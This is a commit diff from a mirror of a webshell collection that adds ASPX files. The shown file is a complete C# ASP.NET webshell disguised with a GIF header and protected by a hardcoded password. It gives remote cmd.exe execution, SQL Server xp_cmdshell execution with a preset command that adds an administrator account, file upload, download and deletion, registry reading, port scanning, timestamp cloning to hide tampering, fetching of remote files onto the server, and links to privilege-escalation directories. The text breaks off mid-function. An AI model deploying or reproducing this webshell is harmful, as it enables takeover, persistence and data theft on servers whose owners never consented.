mirror of
https://github.com/tennc/webshell
synced 2025-02-22 20:58:27 +00:00
update aspx
This commit is contained in:
parent
9258cfc622
commit
d267416af6
7 changed files with 4511 additions and 1 deletions
1266
aspx/2013110125027897.asp
Normal file
1266
aspx/2013110125027897.asp
Normal file
File diff suppressed because one or more lines are too long
900
aspx/2013110125222650.aspx
Normal file
900
aspx/2013110125222650.aspx
Normal file
|
@ -0,0 +1,900 @@
|
|||
gif89a<%@ Page Language="C#" ContentType="text/html" validateRequest="false" aspcompat="true"%>
|
||||
<%@ Import Namespace="System.IO" %>
|
||||
<%@ import namespace="System.Diagnostics" %>
|
||||
<%@ Import Namespace="Microsoft.Win32" %>
|
||||
<%@ Import Namespace="System.Collections" %>
|
||||
<%@ Import Namespace="System.Net" %>
|
||||
<%@ Import Namespace="System.Data.SqlClient" %>
|
||||
<%@ Import Namespace="System.Threading" %>
|
||||
<%@ Import Namespace="System.Net.Sockets" %>
|
||||
<%@ Import Namespace="System.Diagnostics" %>
|
||||
<%
|
||||
//-------------------------------Code by sunue--------------------------------
|
||||
//--------------------------------------------
|
||||
%>
|
||||
|
||||
<script runat="server">
|
||||
|
||||
public string PWD ="edi"; //
|
||||
|
||||
string GetParentDir(string subdir)
|
||||
{
|
||||
string holepath = subdir;
|
||||
char[] separator = { '\\' };
|
||||
String[] patharray = new String[20];
|
||||
patharray = holepath.Split(separator);
|
||||
string parentdir="";
|
||||
int arraynum=0;
|
||||
for (arraynum = 0; arraynum < (patharray.Length-2);arraynum++ )
|
||||
{
|
||||
if (patharray[arraynum] != null)
|
||||
{
|
||||
parentdir += patharray[arraynum] + "\\";
|
||||
}
|
||||
}
|
||||
//parentdir += patharray[patharray.Length - 2];
|
||||
return parentdir;
|
||||
}
|
||||
|
||||
string GetWebName()
|
||||
{
|
||||
string holepath = Request.CurrentExecutionFilePath;
|
||||
char[] separator = { '/' };
|
||||
String[] patharray = new String[20];
|
||||
patharray = holepath.Split(separator);
|
||||
return patharray[(patharray.Length-1)];
|
||||
}
|
||||
|
||||
void listprocess()
|
||||
{
|
||||
Process[] process = Process.GetProcesses();
|
||||
foreach (Process allprocess in process)
|
||||
{
|
||||
ListBoxPro.Items.Add(allprocess.ProcessName);
|
||||
}
|
||||
string ProcessNum = ListBoxPro.Items.Count.ToString();
|
||||
LbNum.Text = ProcessNum + "个";
|
||||
}
|
||||
void DownFile(string src)
|
||||
{
|
||||
string pathfile = src; //pathfile 要下载的文件名称
|
||||
FileInfo file = new FileInfo(pathfile);
|
||||
Response.Clear();
|
||||
Response.AddHeader("Content-Disposition", "attachment; filename=" + HttpUtility.UrlEncode(file.Name));
|
||||
Response.AddHeader("Content-Length", file.Length.ToString());
|
||||
Response.ContentType = "application/octet-stream";
|
||||
Response.WriteFile(file.FullName);
|
||||
Response.End();
|
||||
}
|
||||
|
||||
void GetDir(string Url,string file_name)
|
||||
{
|
||||
Response.Write("<table align =\"center\">");
|
||||
Response.Write("<tr>");
|
||||
Response.Write("<td>文件名</td>");
|
||||
Response.Write("<td> </td>");
|
||||
Response.Write("<td>大小</td>");
|
||||
Response.Write("<td> </td>");
|
||||
Response.Write("<td>修改时间</td>");
|
||||
Response.Write("<td> </td>");
|
||||
Response.Write("<td>操作</td>");
|
||||
Response.Write("</tr>");
|
||||
|
||||
DirectoryInfo dir = new DirectoryInfo(Url);
|
||||
if (dir == null)
|
||||
return;
|
||||
try
|
||||
{
|
||||
DirectoryInfo[] dirs = dir.GetDirectories();
|
||||
Response.Write("<tr>");
|
||||
Response.Write("<a href='?page=index&src=" +Server.UrlEncode(GetParentDir(file_name)));
|
||||
Response.Write("'><font color='red'>/*回上一层目录*/</a></font>");
|
||||
Response.Write("\r\n");
|
||||
Response.Write("</tr>");
|
||||
|
||||
foreach (DirectoryInfo file in dirs)
|
||||
{
|
||||
Response.Write("<tr>");
|
||||
Response.Write("<td>");
|
||||
|
||||
Response.Write("<a href='?page=index&src="+Server.UrlEncode(file_name)+Server.UrlEncode(file.Name.ToString())+"\\'>"+file.Name.ToString()+"</a>");
|
||||
Response.Write("</td>");
|
||||
Response.Write("<td> </td>");
|
||||
Response.Write("<td>");
|
||||
Response.Write("<目录>");
|
||||
Response.Write("</td>");
|
||||
Response.Write("<td> </td>");
|
||||
Response.Write("<td>");
|
||||
string time = File.GetCreationTime(file_name+file.Name.ToString()).ToString();
|
||||
Response.Write(time);
|
||||
Response.Write("</td>");
|
||||
Response.Write("<td> </td>");
|
||||
Response.Write("<td>");
|
||||
|
||||
Response.Write("<a href='?action=del&src=");
|
||||
Response.Write(Server.UrlEncode(file_name) + "\\" + Server.UrlEncode(file.Name.ToString()));
|
||||
Response.Write("'onClick='return del(this);'>Del</a>");
|
||||
Response.Write("</td>");
|
||||
Response.Write("</tr>");
|
||||
}
|
||||
|
||||
FileInfo[] files = dir.GetFiles();
|
||||
foreach (FileInfo filed in files)
|
||||
{
|
||||
Response.Write("<tr>");
|
||||
Response.Write("<td>");
|
||||
Response.Write(filed.Name.ToString());
|
||||
Response.Write("</td>");
|
||||
Response.Write("<td> </td>");
|
||||
Response.Write("<td>");
|
||||
string size = file_name + "\\" + filed.Name.ToString();
|
||||
FileInfo info = new FileInfo(size);
|
||||
Response.Write(info.Length.ToString() + "字节");
|
||||
Response.Write("</td>");
|
||||
Response.Write("<td> </td>");
|
||||
Response.Write("<td>");
|
||||
string time = File.GetCreationTime(file_name + "\\" + filed.Name.ToString()).ToString();
|
||||
Response.Write(time);
|
||||
Response.Write("</td>");
|
||||
Response.Write("<td> </td>");
|
||||
Response.Write("<td>");
|
||||
Response.Write("<a href='?action=edit&src=");
|
||||
Response.Write(Server.UrlEncode(file_name) + "\\" + Server.UrlEncode(filed.Name.ToString()));
|
||||
Response.Write("'>Edit</a>");
|
||||
Response.Write(" ");
|
||||
Response.Write("<a href='?action=copy&src=");
|
||||
Response.Write(Server.UrlEncode(file_name) + "\\" +Server.UrlEncode(filed.Name.ToString()));
|
||||
Response.Write("'>Copy</a>");
|
||||
Response.Write(" ");
|
||||
Response.Write("<a href='?action=deldir&src=");
|
||||
Response.Write(Server.UrlEncode(file_name) + "\\" + Server.UrlEncode(filed.Name.ToString()));
|
||||
Response.Write("'onClick='return del(this);'>Del</a>");
|
||||
Response.Write(" ");
|
||||
Response.Write("<a href='?action=down&src=");
|
||||
Response.Write(Server.UrlEncode(file_name) + "\\" +Server.UrlEncode(filed.Name.ToString()));
|
||||
Response.Write("'onClick='return down(this);'>Down</a>");
|
||||
Response.Write(" ");
|
||||
Response.Write("<a href='?action=rename&src=");
|
||||
Response.Write(Server.UrlEncode(file_name) + "\\" + Server.UrlEncode(filed.Name.ToString()));
|
||||
Response.Write("'>Rename</a>");
|
||||
Response.Write("</td>");
|
||||
Response.Write("</tr>");
|
||||
}
|
||||
}
|
||||
catch (Exception)
|
||||
{
|
||||
Response.Write("不存在或访问被拒绝!");
|
||||
return;
|
||||
}
|
||||
Response.Write("</table>");
|
||||
|
||||
}
|
||||
|
||||
</script>
|
||||
<%
|
||||
string page = Request.QueryString["page"];
|
||||
string action = Request.QueryString["action"];
|
||||
string src = Request.QueryString["src"];
|
||||
%>
|
||||
|
||||
<script language="javascript">
|
||||
function del()
|
||||
{
|
||||
if (confirm("大哥,真要删吗?算你狠!!")) { return true; }
|
||||
else { return false; }
|
||||
}
|
||||
</script>
|
||||
<script language="javascript">
|
||||
function down()
|
||||
{
|
||||
if (confirm("如果你下载的文件大于20M\n建议不要用此方式下载\n你可以将此文件拷贝文件到web目录下,使用HTTP下载\n你还是确定用此方式下载吗?")){ return true;}
|
||||
else{ return false; }
|
||||
}
|
||||
</script>
|
||||
<%
|
||||
if (action == "del")
|
||||
{
|
||||
Directory.Delete(src,true);
|
||||
string webname = GetWebName();
|
||||
Response.Redirect(webname + "?page=index&src="+GetParentDir(src));////
|
||||
}
|
||||
if (action == "deldir")
|
||||
{
|
||||
FileInfo fl = new FileInfo(src);
|
||||
fl.Delete();
|
||||
string webname = GetWebName();
|
||||
Response.Redirect(GetParentDir(webname + "?page=index&src=" + src));
|
||||
}
|
||||
%>
|
||||
<%
|
||||
|
||||
if (Session["root"] != null)
|
||||
{
|
||||
|
||||
%>
|
||||
<table align='center'>
|
||||
<tr>
|
||||
<td><font color="red">功能:</font></td>
|
||||
<td>
|
||||
<%
|
||||
Response.Write("<a href='?page=index&src=" + Server.MapPath(".") + "\\'><font color='#009900'>Webshell目录</font></a>");
|
||||
%>
|
||||
</td>
|
||||
<td><a href='?page=info'><font color="#009900">基本信息</font></a></td>
|
||||
<td><a href='?page=process'><font color="#009900">进程管理</font></a></td>
|
||||
<td><a href='?page=newfile'><font color="#009900">新建文件</font></a></td>
|
||||
<td><a href='?page=newdir'><font color="#009900">新建目录</font></a></td>
|
||||
<td><a href='?page=upload'><font color="#009900">文件上传</font></a></td>
|
||||
<td><a href='?page=reg'><font color="#009900">注册表读取</font></a></td>
|
||||
<td><a href='?page=cmd'><font color="#009900">cmd执行</font></a></td>
|
||||
<td><a href='?page=sql'><font color="#009900">sql执行</font></a></td>
|
||||
<td><a href='?page=scan'><font color="#009900">端口扫描</font></a></td>
|
||||
<td><a href='?page=clonetime'><font color="#009900">克隆时间</font></a></td>
|
||||
<td><a href='?page=download'><font color="#009900">远程文件下载</font></a></td>
|
||||
<td><a href='?page=logout'><font color="#009900">登出</font></a></td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td colspan=14><hr></td>
|
||||
</tr>
|
||||
<table align ="center">
|
||||
<tr>
|
||||
<td><font color="red">提权目录:</font> </td>
|
||||
<td><a href='?page=index&src=C:\Program Files\'><font color="#009900">Program Files</font></a> </td>
|
||||
<td><a href='?page=index&src=C:\Documents and Settings\All Users\Documents\'><font color="#009900">Documents</font></a> </td>
|
||||
<td><a href='?page=index&src=C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\'><font color="#009900">PcAnywhere</font></a> </td>
|
||||
<td><a href='?page=index&src=C:\Documents and Settings\All Users\「开始」菜单\程序\'><font color="#009900">开始菜单</font></a> </td>
|
||||
<td><a href='?page=index&src=C:\Documents and Settings\All Users\'><font color="#009900">All Users</font></a> </td>
|
||||
<td><a href='?page=index&src=C:\Program Files\serv-u\'><font color="#009900">Serv-u目录I</font></a> </td>
|
||||
<td><a href='?page=index&src=C:\Program Files\RhinoSoft.com\'><font color="#009900">Serv-u目录II</font></a> </td>
|
||||
<td><a href='?page=index&src=C:\Program Files\Real\'><font color="#009900">Real</font></a> </td>
|
||||
<td><a href='?page=index&src=C:\Program Files\Microsoft SQL Server\'><font color="#009900">Sql Server</font></a> </td>
|
||||
<td><a href='?page=index&src=C:\WINDOWS\system32\config\'><font color="#009900">Config</font></a> </td>
|
||||
<td><a href='?page=index&src=C:\WINDOWS\system32\inetsrv\data\'><font color="#009900">Data</font></a> </td>
|
||||
<td><a href='?page=index&src=C:\windows\Temp\'><font color="#009900">Temp</font></a> </td>
|
||||
</tr>
|
||||
<tr>
|
||||
<td colspan=13><hr></td>
|
||||
</tr>
|
||||
</table>
|
||||
<table align ="center">
|
||||
<tr>
|
||||
<td>
|
||||
<font color="red">盘符浏览:</font>
|
||||
<%
|
||||
String[] drives = Environment.GetLogicalDrives();
|
||||
for (int i = 0; i < drives.Length; i++)
|
||||
{
|
||||
Response.Write("<a href ='"+ GetWebName() +"?page=index&src="+drives[i]+"'>"+ drives[i]+"</a>" + "    ");
|
||||
}
|
||||
|
||||
%>
|
||||
</td>
|
||||
</tr>
|
||||
</table>
|
||||
|
||||
<table align = "center">
|
||||
|
||||
<font color = "red"> 当前路径:</font>
|
||||
<font color = "#009900">
|
||||
<%
|
||||
if (src == null)
|
||||
{
|
||||
Response.Write(Server.MapPath(".")+"\\");
|
||||
}
|
||||
else
|
||||
Response.Write(src);
|
||||
|
||||
%>
|
||||
</font>
|
||||
</table>
|
||||
<hr>
|
||||
<%
|
||||
|
||||
if ((page == "info") && (Session["root"] != null))
|
||||
{
|
||||
this.LbServerNameC.Text = Server.MachineName;
|
||||
this.LbLangC.Text = Request.UserLanguages[0];
|
||||
this.LbIpC.Text = Request.UserHostAddress;
|
||||
this.LbBrowerC.Text = Request.UserAgent;
|
||||
this.LbDnsC.Text = Request.UserHostName;
|
||||
this.LbUrlC.Text = Server.MapPath(".");
|
||||
this.LbUrlXdC.Text = Request.Path;
|
||||
this.LbTimeC.Text = DateTime.Now.ToString();
|
||||
this.Lbversionc.Text = Environment.Version.ToString();
|
||||
this.LbUserc.Text = Environment.UserName;
|
||||
this.LbBBC.Text = Environment.OSVersion.ToString();
|
||||
%>
|
||||
<table align='center'>
|
||||
<tr>
|
||||
<td colspan="10">
|
||||
<asp:Label ID="LbServerName" runat="server" Text="计算机名:" ForeColor="Red"></asp:Label>
|
||||
<asp:Label ID="LbServerNameC" runat="server" BorderStyle="None"></asp:Label></br>
|
||||
<asp:Label ID="LbLang" runat="server" Text="计算机语言:" ForeColor="Red"></asp:Label>
|
||||
<asp:Label ID="LbLangC" runat="server"></asp:Label></br>
|
||||
<asp:Label ID="LbIp" runat="server" Text="计算机IP:" ForeColor="Red"></asp:Label>
|
||||
<asp:Label ID="LbIpC" runat="server"></asp:Label></br>
|
||||
<asp:Label ID="LbUser" runat="server" Text="当前用户:" ForeColor="Red"></asp:Label>
|
||||
<asp:Label ID="LbUserc" runat="server"></asp:Label></br>
|
||||
<asp:Label ID="LbBB" runat="server" Text="服务器版本:" ForeColor="Red"></asp:Label>
|
||||
<asp:Label ID="LbBBC" runat="server"></asp:Label></br>
|
||||
<asp:Label ID="LbDns" runat="server" Text="DNS:" ForeColor="Red"></asp:Label>
|
||||
<asp:Label ID="LbDnsC" runat="server"></asp:Label></br>
|
||||
<asp:Label ID="LbTime" runat="server" Text="计算机时间:" ForeColor="Red"></asp:Label>
|
||||
<asp:Label ID="LbTimeC" runat="server"></asp:Label></br>
|
||||
<asp:Label ID="LbBrower" runat="server" Text="浏览器信息:" ForeColor="Red"></asp:Label>
|
||||
<asp:Label ID="LbBrowerC" runat="server"></asp:Label></br>
|
||||
<asp:Label ID="LbUrl" runat="server" Text="本文件所在绝对路径:" ForeColor="Red"></asp:Label>
|
||||
<asp:Label ID="LbUrlC" runat="server"></asp:Label></br>
|
||||
<asp:Label ID="LbUrlXd" runat="server" Text="本文件所在相对路径:" ForeColor="Red"></asp:Label>
|
||||
<asp:Label ID="LbUrlXdC" runat="server"></asp:Label></br>
|
||||
<asp:Label ID="Lbversion" runat="server" Text=".NET版本:" ForeColor="Red"></asp:Label>
|
||||
<asp:Label ID="Lbversionc" runat="server"></asp:Label></br>
|
||||
|
||||
</td>
|
||||
</tr>
|
||||
</table>
|
||||
|
||||
<%
|
||||
}
|
||||
else if ((page == "reg") && (Session["root"] != null))
|
||||
{
|
||||
%>
|
||||
<table align='center'>
|
||||
<form id="Form2" runat="server">
|
||||
<asp:Label ID="LbRegUrlA" runat="server" Text="请输入要读取的键值注册表路径:"></asp:Label>
|
||||
<asp:Label ID="LbRegC" runat="server" Text="具体项:"></asp:Label><br />
|
||||
<asp:TextBox ID="TextBoxReg" runat="server" Width="551px">HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Terminal Server\Wds\rdpwd\Tds\tcp</asp:TextBox>
|
||||
<asp:TextBox ID="TextBoxB" runat="server" Width="76px">PortNumber</asp:TextBox></br>
|
||||
<asp:Button ID="ButtonReg" runat="server" OnClick="ButtonReg_Click" Text="Regedit" />
|
||||
<asp:Label ID="Label1" runat="server" Text="您读取的值为:"></asp:Label>
|
||||
<asp:Label ID="LbReg" runat="server" Width="319px"></asp:Label>
|
||||
</form>
|
||||
</table>
|
||||
|
||||
<script runat="server">
|
||||
|
||||
protected void ButtonReg_Click(object sender, EventArgs e)
|
||||
{
|
||||
try
|
||||
{
|
||||
|
||||
string regvalue = TextBoxReg.Text;
|
||||
string val = TextBoxB.Text;
|
||||
string vals = "该值不存在哦";
|
||||
|
||||
char[] separator = { '\\' };
|
||||
String[] patharray = new String[80];
|
||||
patharray = regvalue.Split(separator);
|
||||
|
||||
string lastvalue="";
|
||||
|
||||
for (int i = 1; i < patharray.Length; i++)
|
||||
{
|
||||
lastvalue = lastvalue + patharray[i] + "\\";
|
||||
}
|
||||
|
||||
switch(patharray[0])
|
||||
{
|
||||
case "HKEY_LOCAL_MACHINE":
|
||||
RegistryKey reg = Registry.LocalMachine.OpenSubKey(lastvalue);
|
||||
LbReg.Text = reg.GetValue(val, "null").ToString();
|
||||
break;
|
||||
case "HKEY_CLASSES_ROOT":
|
||||
RegistryKey rega = Registry.ClassesRoot.OpenSubKey(lastvalue);
|
||||
LbReg.Text = rega.GetValue(val, "null").ToString();
|
||||
break;
|
||||
case "HKEY_CURRENT_USER":
|
||||
RegistryKey regb = Registry.CurrentUser.OpenSubKey(lastvalue);
|
||||
LbReg.Text = regb.GetValue(val, "null").ToString();
|
||||
break;
|
||||
case "HKEY_USERS":
|
||||
RegistryKey regc = Registry.Users.OpenSubKey(lastvalue);
|
||||
LbReg.Text = regc.GetValue(val, "null").ToString();
|
||||
break;
|
||||
case "HKEY_CURRENT_CONFIG":
|
||||
RegistryKey regd = Registry.CurrentConfig.OpenSubKey(lastvalue);
|
||||
LbReg.Text = regd.GetValue(val, "null").ToString();
|
||||
break;
|
||||
default:
|
||||
LbReg.Text = val;
|
||||
break;
|
||||
|
||||
}
|
||||
|
||||
|
||||
}
|
||||
catch (Exception)
|
||||
{
|
||||
Response.Write("或许有什么地方输入错误?或许注册表不允许读?");
|
||||
}
|
||||
}
|
||||
|
||||
</script>
|
||||
|
||||
<%
|
||||
}
|
||||
else if ((page == "upload") && (Session["root"] != null))
|
||||
{
|
||||
%>
|
||||
|
||||
<table align="center">
|
||||
<form id="Form1" method="post" encType="multipart/form-data" runat="server">
|
||||
保存路径:<asp:TextBox ID="TextBoxSaveUpUrl" runat="server" Width="417px"></asp:TextBox><br />
|
||||
<input name="upfile" type="file" class="TextBox" id="UpFile" runat="server" style="width: 447px">
|
||||
<asp:Button ID="ButtonFuckUp" runat="server" OnClick="ButtonFuckUp_Click" Text="上传" Width="57px" /><br />
|
||||
</form>
|
||||
</table>
|
||||
<script runat="server">
|
||||
protected void ButtonFuckUp_Click(object sender, EventArgs e)
|
||||
{
|
||||
string upload = TextBoxSaveUpUrl.Text;
|
||||
UpFile.PostedFile.SaveAs(upload);
|
||||
}
|
||||
|
||||
</script>
|
||||
|
||||
<%
|
||||
}
|
||||
else if ((page == "cmd") && (Session["root"] != null))
|
||||
{
|
||||
%>
|
||||
<table align='center'>
|
||||
<form id="Form3" runat="server">
|
||||
<asp:Label ID="LbDos" runat="server" Text="DOS命令:"></asp:Label>
|
||||
<asp:TextBox ID="TextBoxDos" runat="server" Width="499px">net user</asp:TextBox>
|
||||
<asp:Button ID="ButtonDos" runat="server" OnClick="ButtonCmd_Click" Text="CMD" /></br>
|
||||
<asp:TextBox ID="TextBoxDosC" runat="server" Height="300px" Width="570px" BorderStyle="Dotted" TextMode="MultiLine"></asp:TextBox>
|
||||
</form>
|
||||
</table>
|
||||
<script runat="server">
|
||||
protected void ButtonCmd_Click(object sender, EventArgs e)
|
||||
{
|
||||
TextBoxDosC.Text = "";
|
||||
Process myprocess = new Process();
|
||||
ProcessStartInfo MyProcessStartInfo = new ProcessStartInfo("cmd.exe");
|
||||
MyProcessStartInfo.UseShellExecute = false;
|
||||
MyProcessStartInfo.RedirectStandardOutput = true;
|
||||
myprocess.StartInfo = MyProcessStartInfo;
|
||||
MyProcessStartInfo.Arguments = "/c" + TextBoxDos.Text;
|
||||
myprocess.Start();
|
||||
StreamReader mystream = myprocess.StandardOutput;
|
||||
TextBoxDosC.Text = mystream.ReadToEnd();
|
||||
mystream.Close();
|
||||
}
|
||||
</script>
|
||||
|
||||
<%
|
||||
}
|
||||
else if ((page == "sql") && (Session["root"] != null))
|
||||
{
|
||||
%>
|
||||
<table align='center'>
|
||||
<form id="Form4" runat="server">
|
||||
<asp:Label ID="LbSqlA" runat="server" Text="Sql Host:"></asp:Label>
|
||||
<asp:TextBox ID="TextBoxSqlA" runat="server" Width="410px">.</asp:TextBox></br>
|
||||
<asp:Label ID="LbSqlB" runat="server" Text="Sql UserName:"></asp:Label>
|
||||
<asp:TextBox ID="TextBoxSqlB" runat="server" >sa</asp:TextBox>
|
||||
<asp:Label ID="LbSqlC" runat="server" Text="Sql Pwd:"></asp:Label>
|
||||
<asp:TextBox ID="TextBoxSqlC" runat="server">sa</asp:TextBox>
|
||||
<asp:Button ID="ButtonSqlCon" runat="server" Text="连接" Width="51px" OnClick="ButtonSqlCon_Click" /></br>
|
||||
<asp:Label ID="LbSqlD" runat="server" Text="Command:" Width="42px"></asp:Label>
|
||||
<asp:TextBox ID="TextBoxSqlCon" runat="server" Width="400px" >net user char char /add & net localgroup administrators char /add</asp:TextBox>
|
||||
<asp:Button ID="ButtonSqlCmd" runat="server" Text="执行" Width="52px" OnClick="ButtonSqlCmd_Click" /></br>
|
||||
<asp:TextBox ID="TextBoxSqlCmd" runat="server" Height="106px" Width="470px"></asp:TextBox>
|
||||
</form>
|
||||
</table>
|
||||
<script runat="server">
|
||||
protected void ButtonSqlCon_Click(object sender, EventArgs e)
|
||||
{
|
||||
try
|
||||
{
|
||||
SqlConnection mycon = new SqlConnection();
|
||||
mycon.ConnectionString = "Persist Security Info = False;User id =" + TextBoxSqlB.Text + ";pwd=" + TextBoxSqlC.Text + ";server=" + TextBoxSqlA.Text;
|
||||
mycon.Open();
|
||||
mycon.Close();
|
||||
Response.Write("恭喜你,连接测试成功!");
|
||||
}
|
||||
catch (Exception)
|
||||
{
|
||||
Response.Write("请检查账户密码,连接测试失败!");
|
||||
}
|
||||
}
|
||||
|
||||
protected void ButtonSqlCmd_Click(object sender, EventArgs e)
|
||||
{
|
||||
try
|
||||
{
|
||||
SqlConnection mycon = new SqlConnection();
|
||||
mycon.ConnectionString = "Persist Security Info = False;User id =" + TextBoxSqlB.Text + ";pwd=" + TextBoxSqlC.Text + ";server=" + TextBoxSqlA.Text;
|
||||
mycon.Open();
|
||||
SqlCommand cmd = new SqlCommand();
|
||||
cmd.Connection = mycon;
|
||||
cmd.CommandText = "exec master..xp_cmdshell '" + TextBoxSqlCon.Text + "'";
|
||||
cmd.ExecuteNonQuery();
|
||||
|
||||
TextBoxSqlCmd.Text = "命令成功执行!";
|
||||
mycon.Close();
|
||||
}
|
||||
catch (Exception)
|
||||
{
|
||||
TextBoxSqlCmd.Text = "命令执行失败!";
|
||||
}
|
||||
|
||||
}
|
||||
|
||||
</script>
|
||||
|
||||
<%
|
||||
}
|
||||
else if ((page == "scan") && (Session["root"] != null))
|
||||
{
|
||||
%>
|
||||
<table align='center'>
|
||||
<form id="Form5" runat="server">
|
||||
IP:<asp:TextBox ID="TextBoxScanIP" runat="server" Width="238px">127.0.0.1</asp:TextBox>
|
||||
port(多端口请用逗号隔开)<asp:TextBox ID="TextBoxScanPort" runat="server" Width="238px">21,1433,3389</asp:TextBox>
|
||||
<asp:Button ID="ButtonScan" runat="server" OnClick="ButtonScan_Click" Text="扫描" Width="51px" /><br />
|
||||
<asp:Label ID="LbScan" runat="server" Width="666px"></asp:Label>
|
||||
</form>
|
||||
</table>
|
||||
<script runat="server">
|
||||
protected void ButtonScan_Click(object sender, EventArgs e)
|
||||
{
|
||||
LbScan.Text = "";
|
||||
TcpClient client = new TcpClient();
|
||||
string allport = TextBoxScanPort.Text;
|
||||
char[] separator = { ',' };
|
||||
String[] portarray = new String[20];
|
||||
portarray = allport.Split(separator);
|
||||
int portnum = 0;
|
||||
while (portnum < portarray.Length)
|
||||
{
|
||||
IPAddress address = IPAddress.Parse(TextBoxScanIP.Text);
|
||||
int i = int.Parse(portarray[portnum]);
|
||||
try
|
||||
{
|
||||
client.Connect(address, i);
|
||||
LbScan.Text +="<font color='red'>"+i.ToString()+"<font>端口杂就开了捏!</br>";
|
||||
client.Close();
|
||||
}
|
||||
catch (SocketException)
|
||||
{
|
||||
LbScan.Text += i + "端口杂没开捏!<br>";
|
||||
}
|
||||
portnum++;
|
||||
}
|
||||
client.Close();
|
||||
}
|
||||
</script>
|
||||
|
||||
<%
|
||||
}
|
||||
|
||||
%>
|
||||
|
||||
<%
|
||||
else if (page == "logout")
|
||||
{
|
||||
Session["root"] = null;
|
||||
Response.Redirect(GetWebName());
|
||||
%>
|
||||
|
||||
<%
|
||||
}
|
||||
else if ((page == "clonetime") && (Session["root"] != null))
|
||||
{
|
||||
|
||||
%> <table align='center'>
|
||||
<form id="Form6" runat="server">
|
||||
要克隆的文件:<asp:TextBox ID="TextBoxWant" runat="server" Width="270px"></asp:TextBox></br>
|
||||
被克隆的文件:<asp:TextBox ID="TextBoxTo" runat="server" Width="270px"></asp:TextBox>
|
||||
<asp:Button ID="Button_Clone" runat="server" OnClick="ButtonClone_Click" Text="克隆" Width="48px" />
|
||||
</form>
|
||||
<table>
|
||||
|
||||
<script runat="server">
|
||||
protected void ButtonClone_Click(object sender, EventArgs e)
|
||||
{
|
||||
FileInfo filewant = new FileInfo(TextBoxWant.Text.ToString());
|
||||
FileInfo filego = new FileInfo(TextBoxTo.Text.ToString());
|
||||
filewant.LastWriteTime = filego.LastWriteTime;
|
||||
filewant.LastAccessTime = filego.LastAccessTime;
|
||||
filewant.CreationTime = filego.CreationTime;
|
||||
Response.Write("Clone time success!");
|
||||
}
|
||||
</script>
|
||||
<%
|
||||
}
|
||||
else if ((page == "download") && (Session["root"] != null))
|
||||
{
|
||||
%>
|
||||
<table align='center'>
|
||||
<form id="Form7" runat="server">
|
||||
下载地址:<asp:TextBox ID="TextBoxDurl" runat="server" Width="270px">http://www.baidu.com/img/logo.gif</asp:TextBox></br>
|
||||
保存路径:<asp:TextBox ID="TextBoxDfile" runat="server" Width="270px">c:\logo.gif</asp:TextBox>
|
||||
<asp:Button ID="ButtonDown" runat="server" OnClick="ButtonDown_Click" Text="下载" />
|
||||
</form>
|
||||
</table>
|
||||
<script runat="server">
|
||||
protected void ButtonDown_Click(object sender, EventArgs e)
|
||||
{
|
||||
string url = TextBoxDurl.Text.ToString();
|
||||
string file = TextBoxDfile.Text.ToString();
|
||||
WebClient wc = new WebClient();
|
||||
Stream str = wc.OpenRead(url);
|
||||
byte[] bytes = new byte[1024];
|
||||
int len = 0;
|
||||
FileStream fs = new FileStream(file, FileMode.OpenOrCreate, FileAccess.Write);
|
||||
while ((len = str.Read(bytes, 0, 1024)) != 0)
|
||||
{
|
||||
fs.Write(bytes, 0, len);
|
||||
}
|
||||
fs.Close();
|
||||
}
|
||||
</script>
|
||||
<%
|
||||
}
|
||||
else if ((page == "newdir") && (Session["root"] != null))
|
||||
{
|
||||
%>
|
||||
<table align='center'>
|
||||
<form id="Form8" runat="server">
|
||||
输入路径和文件夹名称:<asp:TextBox ID="TextBoxNewDir" runat="server" Width="368px"></asp:TextBox>
|
||||
<asp:Button ID="ButtonNewDir" runat="server" OnClick="ButtonNewDir_Click" Text="创建目录" /><br />
|
||||
</form>
|
||||
</table>
|
||||
<script runat="server">
|
||||
protected void ButtonNewDir_Click(object sender, EventArgs e)
|
||||
{
|
||||
Directory.CreateDirectory(TextBoxNewDir.Text.ToString());
|
||||
Response.Write("目录创建成功!");
|
||||
}
|
||||
</script>
|
||||
<%
|
||||
}
|
||||
else if ((page == "index") && Session["root"] != null)
|
||||
{
|
||||
%>
|
||||
|
||||
<%
|
||||
if (src == "")
|
||||
{
|
||||
Response.Write("<font color='red'>我已经无法再跳上层目录了,请往回走,谢谢!</font>");
|
||||
}
|
||||
else
|
||||
GetDir(src, src);
|
||||
%>
|
||||
|
||||
<%
|
||||
}
|
||||
else if ((page == "process") && Session["root"] != null)
|
||||
{
|
||||
ListBoxPro.Items.Clear();
|
||||
listprocess();
|
||||
%>
|
||||
<form id="Form11" runat="server">
|
||||
<table align = "center">
|
||||
|
||||
<tr>
|
||||
<td><font color ="red">可带参数执行指定程序功能(权限限制):</font><br>
|
||||
<font color ="red">执行程序(绝对路径):</font><asp:TextBox ID="TextBoxExe" runat="server" Width="200px"></asp:TextBox><br>
|
||||
<font color ="red">参数(若无,可不写):</font>
|
||||
<asp:TextBox ID="TextBoxExeC" runat="server" Width="208px"></asp:TextBox>
|
||||
<asp:Button ID="ButtonExe" runat="server" OnClick="ButtonExe_Click" Text="执行" Width="44px" /></p>
|
||||
<td>
|
||||
</tr>
|
||||
</table>
|
||||
|
||||
<table align="center">
|
||||
<tr>
|
||||
<font color="red"> 当前进程:</font>
|
||||
<td>
|
||||
|
||||
|
||||
<asp:ListBox ID="ListBoxPro" runat="server" Height="300px" Width="300px"></asp:ListBox><br />
|
||||
总进程数:<asp:Label ID="LbNum" runat="server"></asp:Label><br />
|
||||
<asp:Button ID="ButtonProDel" runat="server" OnClick="ButtonProDel_Click" Text="选中 删除" Width="70px" />
|
||||
|
||||
<asp:Button ID="ButtonProClear" runat="server" OnClick="ButtonProClear_Click" Text="刷新" Width="51px" />
|
||||
</form>
|
||||
</td>
|
||||
</tr>
|
||||
</table>
|
||||
<script runat="server">
|
||||
protected void ButtonExe_Click(object sender, EventArgs e)
|
||||
{
|
||||
Process exe = new Process();
|
||||
exe.StartInfo.FileName = TextBoxExe.Text.ToString();
|
||||
exe.StartInfo.Arguments = TextBoxExeC.Text.ToString();
|
||||
exe.Start();
|
||||
}
|
||||
|
||||
protected void ButtonProDel_Click(object sender, EventArgs e)
|
||||
{
|
||||
|
||||
Process[] killprocess = Process.GetProcesses();
|
||||
try
|
||||
{
|
||||
foreach (Process kill in killprocess)
|
||||
{
|
||||
string processname = ListBoxPro.SelectedValue.ToString();
|
||||
if (processname == kill.ProcessName)
|
||||
kill.Kill();
|
||||
